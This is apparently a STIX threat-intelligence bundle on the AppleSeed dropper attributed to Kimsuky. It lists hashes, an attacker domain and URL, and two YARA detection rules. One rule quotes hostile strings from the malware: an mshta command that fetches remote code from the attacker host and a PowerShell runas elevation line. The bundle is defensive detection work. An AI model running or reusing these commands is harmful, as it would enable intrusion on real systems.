{
    "type": "bundle",
    "id": "bundle--63839e36-ec4f-48cd-99b6-5b2f9cdfe94c",
    "objects": [
        {
            "type": "identity",
            "spec_version": "2.1",
            "id": "identity--aa1f6b1b-a647-4d2a-9517-9110ff9b0275",
            "created": "2026-04-05T23:39:49.189369Z",
            "modified": "2026-04-05T23:48:56.132858Z",
            "name": "CyberAndRamen",
            "identity_class": "organization"
        },
        {
            "type": "file",
            "spec_version": "2.1",
            "id": "file--e43473c0-3e2d-4223-a723-5cfa6e7f1127",
            "hashes": {
                "MD5": "851e33373114fef45d0fe28c6934fa73"
            }
        },
        {
            "type": "domain-name",
            "spec_version": "2.1",
            "id": "domain-name--7f066a0f-11f2-46f4-acbc-b2c4ccd5011b",
            "value": "leomin.dothome.co.kr"
        },
        {
            "type": "indicator",
            "spec_version": "2.1",
            "id": "indicator--204c8814-6686-4fe5-bfc1-da50042c87ea",
            "created": "2026-06-24T18:11:30.910063Z",
            "modified": "2026-06-24T18:11:30.910063Z",
            "name": "YARA Rule",
            "pattern": "rule NK_APT_AppleSeed_Backdoor {\r\nmeta:\r\ndescription = \" \u2013 file AutoUpdate.dll\"\r\nauthor = \"Michael Rippey\"\r\nreference = \"https://asec.ahnlab.com/ko/34883/\"\r\ndate = \"2022-06-01\"\r\nhash = \"e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea\"\r\nstrings:\r\n$a1 = \"ADVAPI32.dll\" fullword ascii\r\n$a2 = \"KERNEL32.DLL\" fullword ascii\r\n$a3 = \"freed.dll\" fullword ascii\r\n$a4 = \"outlook\" fullword wide\r\n$a5 = \"CryptEncrypt\" fullword ascii\r\n$a6 = \"amily not supporte\" fullword ascii\r\n$a7 = \"connecyar\" fullword ascii\r\n$a8 = \"rerictaj\" fullword ascii\r\n$a9 = \"lrgeabik\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize < 400KB and\r\n5 of them\r\n}",
            "pattern_type": "yara",
            "valid_from": "2022-06-05T00:00:00Z"
        },
        {
            "type": "indicator",
            "spec_version": "2.1",
            "id": "indicator--acea2774-e3d2-4056-b8e9-8a710dbf35b1",
            "created": "2026-06-24T18:11:30.910802Z",
            "modified": "2026-06-24T18:11:30.910802Z",
            "name": "YARA Rule",
            "pattern": "rule NK_APT_AppleSeed_Dropper {\r\nmeta:\r\ndescription = \" \u2013 file firmware upgrade installer.exe\"\r\nauthor = \"Michael Rippey\"\r\nreference = \"https://asec.ahnlab.com/ko/34883/\"\r\ndate = \"2022-06-01\"\r\nhash = \"e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f\"\r\nstrings:\r\n$a = \"powershell.exe start-process \\\"%s\\\" -argumentlist '%s' -verb runas\" fullword wide\r\n$b1 = \"mshta.exe http://leomin.dothome.co.kr/update/?mode=login\" fullword ascii\r\n$b2 = \"USER32.dll\" fullword ascii\r\n$b3 = \"KERNEL32.dll\" fullword ascii\r\n$b4 = \"kernel32.dll\" fullword wide\r\n$b5 = \"mscoree.dll\" fullword wide\r\n$b6 = \"https://iptime.com\" fullword wide\r\n$b7 = \"broken pipe\" fullword ascii\r\n$b8 = \"executable format error\" fullword ascii\r\n$b9 = \"host unreachable\" fullword ascii\r\n$b10 = \"connection already in progress\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize < 1000KB and\r\n1 of ($a*) and 4 of them\r\n}",
            "pattern_type": "yara",
            "valid_from": "2022-06-05T00:00:00Z"
        },
        {
            "type": "file",
            "spec_version": "2.1",
            "id": "file--a0f25428-273a-4082-b914-e0571990363a",
            "hashes": {
                "SHA-256": "e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea"
            }
        },
        {
            "type": "file",
            "spec_version": "2.1",
            "id": "file--1b829bfd-f9c2-499e-b295-de27733cbcfa",
            "hashes": {
                "SHA-256": "e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f"
            }
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--acc9bf9e-54dc-44be-a9f6-3b775306b8e3",
            "value": "http://leomin.dothome.co.kr/update/?mode=login"
        },
        {
            "type": "threat-actor",
            "spec_version": "2.1",
            "id": "threat-actor--3cad7692-b5b4-565b-88b1-63998b3f44a1",
            "created": "2026-06-24T18:11:30.915832Z",
            "modified": "2026-06-24T18:11:30.915832Z",
            "name": "Kimsuky"
        },
        {
            "type": "report",
            "spec_version": "2.1",
            "id": "report--b450c638-9961-4a82-8032-8dbdd5188804",
            "created_by_ref": "identity--aa1f6b1b-a647-4d2a-9517-9110ff9b0275",
            "created": "2026-06-24T18:11:30.926428Z",
            "modified": "2026-06-24T18:11:30.926428Z",
            "name": "Overview of AppleSeed Dropper",
            "published": "2022-06-05T00:00:00Z",
            "object_refs": [
                "identity--aa1f6b1b-a647-4d2a-9517-9110ff9b0275",
                "file--e43473c0-3e2d-4223-a723-5cfa6e7f1127",
                "domain-name--7f066a0f-11f2-46f4-acbc-b2c4ccd5011b",
                "indicator--204c8814-6686-4fe5-bfc1-da50042c87ea",
                "indicator--acea2774-e3d2-4056-b8e9-8a710dbf35b1",
                "file--a0f25428-273a-4082-b914-e0571990363a",
                "file--1b829bfd-f9c2-499e-b295-de27733cbcfa",
                "url--acc9bf9e-54dc-44be-a9f6-3b775306b8e3",
                "threat-actor--3cad7692-b5b4-565b-88b1-63998b3f44a1"
            ],
            "external_references": [
                {
                    "source_name": "source",
                    "url": "https://cyberandramen.net/2022/06/05/overview-of-appleseed-dropper/"
                }
            ]
        }
    ]
}